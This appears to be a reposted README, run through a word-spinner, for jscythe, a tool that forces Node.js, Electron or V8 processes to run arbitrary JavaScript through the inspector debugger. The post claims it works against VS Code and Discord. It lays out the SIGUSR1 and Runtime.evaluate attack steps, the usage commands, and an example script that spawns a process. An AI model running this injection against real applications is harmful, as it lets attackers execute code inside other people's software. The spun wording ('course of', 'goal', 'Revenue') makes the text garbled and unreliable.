Wednesday, November 2, 2022
HomeHackerAbuse The Node.Js Inspector Mechanism In Order To Pressure Any Node.Js/Electron/V8 Primarily...

Abuse The Node.Js Inspector Mechanism In Order To Pressure Any Node.Js/Electron/V8 Primarily based Course of To Execute Arbitrary Javascript Code




jscythe abuses the node.js inspector mechanism so as to drive any node.js/electron/v8 primarily based course of to execute arbitrary javascript code, even when their debugging capabilities are disabled.

Examined and dealing in opposition to Visible Studio Code, Discord, any Node.js utility and extra!

How

  1. Find the goal course of.
  2. Ship SIGUSR1 sign to the method, it will allow the debugger on a port (relying on the software program, typically it is random, typically it isn’t).
  3. Decide debugging port by diffing open ports earlier than and after sending SIGUSR1.
  4. Get the websocket debugging URL and session id from http://localhost:<port>/json.
  5. Ship a Runtime.consider request with the supplied code.
  6. Revenue.

Constructing

Working

Goal a selected course of and execute a primary expression:

./goal/debug/jscythe --pid 666 --code "5 - 3 + 2"

Execute code from a file:

./goal/debug/jscythe --pid 666 --script example_script.js

The example_script.js can require any node module and execute any code, like:

require('child_process').spawnSync('/System/Purposes/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout

Search course of by expression:

./goal/debug/jscythe --search extensionHost --script example_script.js

Different choices

Run jscythe --help for the whole checklist of choices.

License

This undertaking is made with ♥ by @evilsocket and it’s launched underneath the GPL3 license.



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments